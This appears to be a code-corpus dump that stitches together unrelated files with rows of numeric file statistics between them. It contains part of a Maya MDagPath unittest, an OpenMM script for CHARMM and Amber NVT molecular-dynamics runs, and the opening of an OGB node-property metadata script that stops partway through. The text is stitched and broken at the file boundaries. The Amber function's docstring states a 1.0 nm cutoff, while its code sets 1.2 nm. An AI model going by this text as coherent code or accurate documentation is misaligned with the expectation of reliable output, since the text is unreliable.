self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|awesome:light')
dagPath = OpenMaya.MDagPath.bnGet(pattern='*|awesome:light')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|awesome:light')
dagPath = OpenMaya.MDagPath.bnGet(pattern='*|*:light')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|awesome:light')
dagPath = OpenMaya.MDagPath.bnGet(pattern='|master|cube|cubeShape')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|cube|cubeShape')
dagPath = OpenMaya.MDagPath.bnGet(pattern='|master|cube|intermediary1')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|cube|intermediary1')
dagPath = OpenMaya.MDagPath.bnGet(pattern='|master|cube|intermediary2')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|cube|intermediary2')
dagPath = OpenMaya.MDagPath.bnGet(pattern='|master|cube|template')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|cube|template')
dagPath = OpenMaya.MDagPath.bnGet(pattern='|master|sphere|sphereShape->|projectionCurve1')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|sphere|sphereShape->|projectionCurve1')
dagPath = OpenMaya.MDagPath.bnGet(pattern='|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_1|projectionCurve1_Shape1')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_1|projectionCurve1_Shape1')
dagPath = OpenMaya.MDagPath.bnGet(pattern='|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_2|projectionCurve1_Shape2')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_2|projectionCurve1_Shape2')
dagPath = OpenMaya.MDagPath.bnGet(pattern='*|sphereShape->|projectionCurve1')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|sphere|sphereShape->|projectionCurve1')
dagPath = OpenMaya.MDagPath.bnGet(pattern='*|sphereShape->|projectionCurve1|projectionCurve1_1|projectionCurve1_Shape1')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_1|projectionCurve1_Shape1')
dagPath = OpenMaya.MDagPath.bnGet(pattern='*|sphereShape->|projectionCurve1|projectionCurve1_2|projectionCurve1_Shape2')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_2|projectionCurve1_Shape2')
dagPath = OpenMaya.MDagPath.bnGet(pattern='*|sphereShape->|*|projectionCurve1_1|projectionCurve1_Shape1')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_1|projectionCurve1_Shape1')
dagPath = OpenMaya.MDagPath.bnGet(pattern='*|sphereShape->|*|projectionCurve1_2|projectionCurve1_Shape2')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_2|projectionCurve1_Shape2')
dagPath = OpenMaya.MDagPath.bnGet(pattern='*|sphereShape->|*|projectionCurve1_Shape1')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_1|projectionCurve1_Shape1')
dagPath = OpenMaya.MDagPath.bnGet(pattern='*|sphereShape->|*|projectionCurve1_Shape2')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_2|projectionCurve1_Shape2')
def testBnFindChildren(self):
dpRoot = OpenMaya.MDagPath.bnGet(pattern='|master')
dagPaths = list(dpRoot.bnFindChildren())
self.assertEqual(len(dagPaths), 28)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|awesome:light', '|master|awesome:light|awesome:lightShape', '|master|awesome_node', '|master|circle', '|master|circle|circleShape', '|master|cube', '|master|cube|cubeShape', '|master|cube|intermediary1', '|master|cube|intermediary2', '|master|cube|template', '|master|n0de', '|master|node', '|master|node_awesome', '|master|root_1', '|master|root_1|child_1', '|master|root_1|child_1|node', '|master|root_2', '|master|root_2|child_2', '|master|root_2|child_2|grandchild', '|master|root_2|child_2|grandchild|node', '|master|sphere', '|master|sphere|sphereShape', '|master|sphere|sphereShape->', '|master|sphere|sphereShape->|projectionCurve1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_1|projectionCurve1_Shape1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_2', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_2|projectionCurve1_Shape2'])
dagPaths = list(dpRoot.bnFindChildren(fnType=OpenMaya.MFn.kPointLight))
self.assertEqual(len(dagPaths), 1)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|awesome:light|awesome:lightShape'])
dagPaths = list(dpRoot.bnFindChildren(recursive=False))
self.assertEqual(len(dagPaths), 10)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|awesome:light', '|master|awesome_node', '|master|circle', '|master|cube', '|master|n0de', '|master|node', '|master|node_awesome', '|master|root_1', '|master|root_2', '|master|sphere'])
dagPaths = list(dpRoot.bnFindChildren(traverseUnderWorld=False))
self.assertEqual(len(dagPaths), 22)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|awesome:light', '|master|awesome:light|awesome:lightShape', '|master|awesome_node', '|master|circle', '|master|circle|circleShape', '|master|cube', '|master|cube|cubeShape', '|master|cube|intermediary1', '|master|cube|intermediary2', '|master|cube|template', '|master|n0de', '|master|node', '|master|node_awesome', '|master|root_1', '|master|root_1|child_1', '|master|root_1|child_1|node', '|master|root_2', '|master|root_2|child_2', '|master|root_2|child_2|grandchild', '|master|root_2|child_2|grandchild|node', '|master|sphere', '|master|sphere|sphereShape'])
dagPaths = list(dpRoot.bnFindChildren(pattern='.'))
self.assertEqual(len(dagPaths), 22)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|awesome:light', '|master|awesome:light|awesome:lightShape', '|master|awesome_node', '|master|circle', '|master|circle|circleShape', '|master|cube', '|master|cube|cubeShape', '|master|cube|intermediary1', '|master|cube|intermediary2', '|master|cube|template', '|master|n0de', '|master|node', '|master|node_awesome', '|master|root_1', '|master|root_1|child_1', '|master|root_1|child_1|node', '|master|root_2', '|master|root_2|child_2', '|master|root_2|child_2|grandchild', '|master|root_2|child_2|grandchild|node', '|master|sphere', '|master|sphere|sphereShape'])
dagPaths = list(dpRoot.bnFindChildren(pattern='.', traverseUnderWorld=False))
self.assertEqual(len(dagPaths), 10)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|awesome:light', '|master|awesome_node', '|master|circle', '|master|cube', '|master|n0de', '|master|node', '|master|node_awesome', '|master|root_1', '|master|root_2', '|master|sphere'])
dagPaths = list(dpRoot.bnFindChildren(pattern='|:.'))
self.assertEqual(len(dagPaths), 9)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|awesome_node', '|master|circle', '|master|cube', '|master|n0de', '|master|node', '|master|node_awesome', '|master|root_1', '|master|root_2', '|master|sphere'])
dagPaths = list(dpRoot.bnFindChildren(pattern='|.:*'))
self.assertEqual(len(dagPaths), 1)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|awesome:light'])
dagPaths = list(dpRoot.bnFindChildren(pattern='|child_1'))
self.assertEqual(len(dagPaths), 0)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), [])
dagPaths = list(dpRoot.bnFindChildren(pattern='*|child_1'))
self.assertEqual(len(dagPaths), 1)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|root_1|child_1'])
dagPaths = list(dpRoot.bnFindChildren(pattern='|*|child_1'))
self.assertEqual(len(dagPaths), 1)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|root_1|child_1'])
dagPaths = list(dpRoot.bnFindChildren(pattern='|node'))
self.assertEqual(len(dagPaths), 1)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|node'])
dagPaths = list(dpRoot.bnFindChildren(pattern='*|node'))
self.assertEqual(len(dagPaths), 3)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|node', '|master|root_1|child_1|node', '|master|root_2|child_2|grandchild|node'])
dagPaths = list(dpRoot.bnFindChildren(pattern='|*|node'))
self.assertEqual(len(dagPaths), 3)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|node', '|master|root_1|child_1|node', '|master|root_2|child_2|grandchild|node'])
dagPaths = list(dpRoot.bnFindChildren(pattern='..|node'))
self.assertEqual(len(dagPaths), 1)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|root_1|child_1|node'])
dagPaths = list(dpRoot.bnFindChildren(pattern='|..|node'))
self.assertEqual(len(dagPaths), 1)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|root_1|child_1|node'])
dagPaths = list(dpRoot.bnFindChildren(pattern='*|node', recursive=False))
self.assertEqual(len(dagPaths), 1)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|node'])
dagPaths = list(dpRoot.bnFindChildren(pattern='*|awesome:*'))
self.assertEqual(len(dagPaths), 2)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|awesome:light', '|master|awesome:light|awesome:lightShape'])
dagPaths = list(dpRoot.bnFindChildren(pattern='+->*'))
self.assertEqual(len(dagPaths), 6)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|sphere|sphereShape->', '|master|sphere|sphereShape->|projectionCurve1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_1|projectionCurve1_Shape1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_2', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_2|projectionCurve1_Shape2'])
dagPaths = list(dpRoot.bnFindChildren(pattern='+->+'))
self.assertEqual(len(dagPaths), 5)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|sphere|sphereShape->|projectionCurve1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_1|projectionCurve1_Shape1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_2', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_2|projectionCurve1_Shape2'])
dagPaths = list(dpRoot.bnFindChildren(recursive=False, copy=False))
self.assertEqual(len(dagPaths), 10)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertTrue(all(dagPath is dagPaths[0] for dagPath in dagPaths))
# This should work in a normal API! But it's Maya we're talking about.
# dagPaths = list(dpRoot.bnFindChildren(fnType=OpenMaya.MFn.kUnderWorld))
# self.assertEqual(len(dagPaths), 1)
# self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
# self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|sphere|sphereShape->'])
dpRoot = OpenMaya.MDagPath.bnGet(pattern='|master|sphere|sphereShape')
dagPaths = list(dpRoot.bnFindChildren())
self.assertEqual(len(dagPaths), 6)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|sphere|sphereShape->', '|master|sphere|sphereShape->|projectionCurve1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_1|projectionCurve1_Shape1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_2', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_2|projectionCurve1_Shape2'])
dagPaths = list(dpRoot.bnFindChildren(recursive=False))
self.assertEqual(len(dagPaths), 1)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|sphere|sphereShape->'])
dagPaths = list(dpRoot.bnFindChildren(pattern='*'))
self.assertEqual(len(dagPaths), 6)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|sphere|sphereShape->', '|master|sphere|sphereShape->|projectionCurve1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_1|projectionCurve1_Shape1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_2', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_2|projectionCurve1_Shape2'])
dagPaths = list(dpRoot.bnFindChildren(pattern='->'))
self.assertEqual(len(dagPaths), 1)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|sphere|sphereShape->'])
dagPaths = list(dpRoot.bnFindChildren(pattern='*->'))
self.assertEqual(len(dagPaths), 1)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|sphere|sphereShape->'])
dagPaths = list(dpRoot.bnFindChildren(pattern='->*'))
self.assertEqual(len(dagPaths), 6)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|sphere|sphereShape->', '|master|sphere|sphereShape->|projectionCurve1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_1|projectionCurve1_Shape1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_2', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_2|projectionCurve1_Shape2'])
dagPaths = list(dpRoot.bnFindChildren(pattern='->.'))
self.assertEqual(len(dagPaths), 5)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|sphere|sphereShape->|projectionCurve1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_1|projectionCurve1_Shape1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_2', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_2|projectionCurve1_Shape2'])
def testBnGetChild(self):
dpRoot = OpenMaya.MDagPath.bnGet(pattern='|master')
self.assertIsNone(dpRoot.bnGetChild())
self.assertIsNone(dpRoot.bnGetChild(recursive=False))
self.assertIsNone(dpRoot.bnGetChild(traverseUnderWorld=False))
self.assertIsNone(dpRoot.bnGetChild(pattern='.'))
dagPath = dpRoot.bnGetChild(fnType=OpenMaya.MFn.kPointLight)
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|awesome:light|awesome:lightShape')
dagPath = dpRoot.bnGetChild(pattern='|.:*')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|awesome:light')
dagPath = dpRoot.bnGetChild(pattern='*|child_1')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|root_1|child_1')
dagPath = dpRoot.bnGetChild(pattern='|*|child_1')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|root_1|child_1')
dagPath = dpRoot.bnGetChild(pattern='|node')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|node')
dagPath = dpRoot.bnGetChild(pattern='..|node')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|root_1|child_1|node')
dagPath = dpRoot.bnGetChild(pattern='|..|node')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|root_1|child_1|node')
dagPath = dpRoot.bnGetChild(pattern='*|node', recursive=False)
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|node')
dpRoot = OpenMaya.MDagPath.bnGet(pattern='|master|sphere|sphereShape')
self.assertIsNone(dpRoot.bnGetChild())
dagPath = dpRoot.bnGetChild(recursive=False)
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|sphere|sphereShape->')
dagPath = dpRoot.bnGetChild(pattern='->')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|sphere|sphereShape->')
dagPath = dpRoot.bnGetChild(pattern='*->')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|sphere|sphereShape->')
def testBnGetParent(self):
dagPath = OpenMaya.MDagPath.bnGet(pattern='|master')
self.assertIsNone(dagPath.bnGetParent())
dagPath = OpenMaya.MDagPath.bnGet(pattern='|master|node')
dpParent = dagPath.bnGetParent()
self.assertIsNot(dpParent, dagPath)
self.assertEqual(dpParent, OpenMaya.MDagPath.bnGet(pattern='|master'))
if __name__ == '__main__':
from tests.run import run
run('__main__')
| 77.887097
| 1,179
| 0.725777
| 4,758
| 43,461
| 6.551072
| 0.035729
| 0.084184
| 0.046198
| 0.076997
| 0.946936
| 0.932916
| 0.917806
| 0.890343
| 0.873661
| 0.865672
| 0
| 0.016162
| 0.12303
| 43,461
| 557
| 1,180
| 78.02693
| 0.801648
| 0.008836
| 0
| 0.567696
| 0
| 0
| 0.340856
| 0.261382
| 0
| 0
| 0
| 0
| 0.619952
| 1
| 0.019002
| false
| 0
| 0.019002
| 0
| 0.04038
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c41c04167aab9904e34d89661d0b8a64d3bbe748
| 5,675
|
py
|
Python
|
molecules/sim/simulation/openmm_simulation.py
|
hengma1001/molecules
|
c6694cc77ef1eb246f3fdab1f201481d1bcaa07c
|
[
"MIT"
] | 2
|
2020-03-16T07:47:42.000Z
|
2021-05-12T11:39:51.000Z
|
molecules/sim/simulation/openmm_simulation.py
|
yngtodd/molecules
|
b16281ae3eda64891f603d23472092051c2bc244
|
[
"MIT"
] | 55
|
2018-02-10T23:22:15.000Z
|
2019-12-22T23:11:13.000Z
|
molecules/sim/simulation/openmm_simulation.py
|
hengma1001/molecules
|
c6694cc77ef1eb246f3fdab1f201481d1bcaa07c
|
[
"MIT"
] | 4
|
2018-08-06T19:49:35.000Z
|
2020-06-03T02:07:42.000Z
|
import simtk.openmm.app as app
import simtk.openmm as omm
import simtk.unit as u
import parmed as pmd
import random
def openmm_simulate_charmm_nvt(top_file, xyz_file, GPU_index=0, output_traj="output.dcd", output_log="output.log", report_time=10*u.picoseconds, sim_time=10*u.nanoseconds):
"""
Start and run an OpenMM NVT simulation with Langevin integrator at 2 fs
time step and 300 K. The cutoff distance for nonbonded interactions were
set at 1.2 nm and LJ switch distance at 1.0 nm, which commonly used with
Charmm force field. Long-range nonbonded interactions were handled with PME.
Parameters
----------
top_file : topology file (.top, .prmtop, ...)
This is the topology file discribe all the interactions within the MD
system.
xyz_file : coordinates file (.gro, .pdb, ...)
This is the molecule configuration file contains all the atom position
and PBC (periodic boundary condition) box in the system.
GPU_index : Int or Str
The device # of GPU to use for running the simulation. Use Strings, '0,1'
for example, to use more than 1 GPU
output_traj : the trajectory file (.dcd)
This is the file stores all the coordinates information of the MD
simulation results.
output_log : the log file (.log)
This file stores the MD simulation status, such as steps, time, potential
energy, temperature, speed, etc.
report_time : 10 ps
The program writes its information to the output every 10 ps by default
sim_time : 10 ns
The timespan of the simulation trajectory
"""
top = pmd.load_file(top_file, xyz = xyz_file)
system = top.createSystem(nonbondedMethod=app.PME, nonbondedCutoff=1.2*u.nanometer,
switchDistance=1.0*u.nanometer, constraints=app.HBonds)
dt = 0.002*u.picoseconds
integrator = omm.LangevinIntegrator(300*u.kelvin, 1/u.picosecond, dt)
try:
platform = omm.Platform_getPlatformByName("CUDA")
properties = {'DeviceIndex': str(GPU_index), 'CudaPrecision': 'mixed'}
except Exception:
platform = omm.Platform_getPlatformByName("OpenCL")
properties = {'DeviceIndex': str(GPU_index)}
simulation = app.Simulation(top.topology, system, integrator, platform, properties)
simulation.context.setPositions(top.positions)
simulation.minimizeEnergy()
report_freq = int(report_time/dt)
simulation.context.setVelocitiesToTemperature(10*u.kelvin, random.randint(1, 10000))
simulation.reporters.append(app.DCDReporter(output_traj, report_freq))
simulation.reporters.append(app.StateDataReporter(output_log,
report_freq, step=True, time=True, speed=True,
potentialEnergy=True, temperature=True, totalEnergy=True))
nsteps = int(sim_time/dt)
simulation.step(nsteps)
def openmm_simulate_amber_nvt(top_file, xyz_file, GPU_index=0, output_traj="output.dcd", output_log="output.log", report_time=10*u.picoseconds, sim_time=10*u.nanoseconds):
"""
Start and run an OpenMM NVT simulation with Langevin integrator at 2 fs
time step and 300 K. The cutoff distance for nonbonded interactions were
set at 1.0 nm, which commonly used along with Amber force field. Long-range
nonbonded interactions were handled with PME.
Parameters
----------
top_file : topology file (.top, .prmtop, ...)
This is the topology file discribe all the interactions within the MD
system.
xyz_file : coordinates file (.gro, .pdb, ...)
This is the molecule configuration file contains all the atom position
and PBC (periodic boundary condition) box in the system.
GPU_index : Int or Str
The device # of GPU to use for running the simulation. Use Strings, '0,1'
for example, to use more than 1 GPU
output_traj : the trajectory file (.dcd)
This is the file stores all the coordinates information of the MD
simulation results.
output_log : the log file (.log)
This file stores the MD simulation status, such as steps, time, potential
energy, temperature, speed, etc.
report_time : 10 ps
The program writes its information to the output every 10 ps by default
sim_time : 10 ns
The timespan of the simulation trajectory
"""
top = pmd.load_file(top_file, xyz = xyz_file)
system = top.createSystem(nonbondedMethod=app.PME, nonbondedCutoff=1.2*u.nanometer,
constraints=app.HBonds)
dt = 0.002*u.picoseconds
integrator = omm.LangevinIntegrator(300*u.kelvin, 1/u.picosecond, dt)
try:
platform = omm.Platform_getPlatformByName("CUDA")
properties = {'DeviceIndex': str(GPU_index), 'CudaPrecision': 'mixed'}
except Exception:
platform = omm.Platform_getPlatformByName("OpenCL")
properties = {'DeviceIndex': str(GPU_index)}
simulation = app.Simulation(top.topology, system, integrator, platform, properties)
simulation.context.setPositions(top.positions)
simulation.minimizeEnergy()
report_freq = int(report_time/dt)
simulation.context.setVelocitiesToTemperature(10*u.kelvin, random.randint(1, 10000))
simulation.reporters.append(app.DCDReporter(output_traj, report_freq))
simulation.reporters.append(app.StateDataReporter(output_log,
report_freq, step=True, time=True, speed=True,
potentialEnergy=True, temperature=True, totalEnergy=True))
nsteps = int(sim_time/dt)
simulation.step(nsteps)
| 39.964789
| 173
| 0.686167
| 736
| 5,675
| 5.206522
| 0.224185
| 0.016701
| 0.014092
| 0.037578
| 0.947547
| 0.947547
| 0.947547
| 0.936326
| 0.936326
| 0.936326
| 0
| 0.018307
| 0.229956
| 5,675
| 141
| 174
| 40.248227
| 0.858581
| 0.432952
| 0
| 0.823529
| 0
| 0
| 0.046496
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.039216
| false
| 0
| 0.098039
| 0
| 0.137255
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c44ecfffe2ee056e29a965b69046c23d5f351233
| 4,217
|
py
|
Python
|
ogb/nodeproppred/make_master_file.py
|
yelongshen/ogb
|
293790ee77576375b40a3c7e0ead15be466963fe
|
[
"MIT"
] | null | null | null |
ogb/nodeproppred/make_master_file.py
|
yelongshen/ogb
|
293790ee77576375b40a3c7e0ead15be466963fe
|
[
"MIT"
] | null | null | null |
ogb/nodeproppred/make_master_file.py
|
yelongshen/ogb
|
293790ee77576375b40a3c7e0ead15be466963fe
|
[
"MIT"
] | 1
|
2021-02-14T04:39:46.000Z
|
2021-02-14T04:39:46.000Z
|
### script for writing meta information of datasets into master.csv
### for node property prediction datasets.
import pandas as pd
dataset_dict = {}
dataset_list = []
### add meta-information about protein function prediction task
name = "ogbn-proteins"
dataset_dict[name] = {"num tasks": 112, "num classes": 2, "eval metric": "rocauc", "task type": "binary classification"}
dataset_dict[name]["download_name"] = "proteinfunc"
dataset_dict[name]["version"] = 1
dataset_dict[name]["url"] = "https://snap.stanford.edu/ogb/data/nodeproppred/"+dataset_dict[name]["download_name"]+".zip"
## For undirected grarph, we only store one directional information. This flag allows us to add inverse edge at pre-processing time
dataset_dict[name]["add_inverse_edge"] = True
dataset_dict[name]["has_node_attr"] = False
dataset_dict[name]["has_edge_attr"] = True
dataset_dict[name]["split"] = "species"
dataset_dict[name]["additional node files"] = 'species'
dataset_dict[name]['additional edge files'] = 'None'
dataset_dict[name]['is hetero'] = False
### add meta-information about product category prediction task
name = "ogbn-products"
dataset_dict[name] = {"num tasks": 1, "num classes": 47, "eval metric": "acc", "task type": "multiclass classification"}
dataset_dict[name]["download_name"] = "products"
dataset_dict[name]["version"] = 1
dataset_dict[name]["url"] = "https://snap.stanford.edu/ogb/data/nodeproppred/"+dataset_dict[name]["download_name"]+".zip"
## For undirected grarph, we only store one directional information. This flag allows us to add inverse edge at pre-processing time
dataset_dict[name]["add_inverse_edge"] = True
dataset_dict[name]["has_node_attr"] = True
dataset_dict[name]["has_edge_attr"] = False
dataset_dict[name]["split"] = "sales_ranking"
dataset_dict[name]["additional node files"] = 'None'
dataset_dict[name]['additional edge files'] = 'None'
dataset_dict[name]['is hetero'] = False
### add meta-information about arxiv category prediction task
name = "ogbn-arxiv"
dataset_dict[name] = {"num tasks": 1, "num classes": 40, "eval metric": "acc", "task type": "multiclass classification"}
dataset_dict[name]["download_name"] = "arxiv"
dataset_dict[name]["version"] = 1
dataset_dict[name]["url"] = "https://snap.stanford.edu/ogb/data/nodeproppred/"+dataset_dict[name]["download_name"]+".zip"
dataset_dict[name]["add_inverse_edge"] = False
dataset_dict[name]["has_node_attr"] = True
dataset_dict[name]["has_edge_attr"] = False
dataset_dict[name]["split"] = "time"
dataset_dict[name]["additional node files"] = 'node_year'
dataset_dict[name]['additional edge files'] = 'None'
dataset_dict[name]['is hetero'] = False
### add meta-information about paper venue prediction task
name = "ogbn-mag"
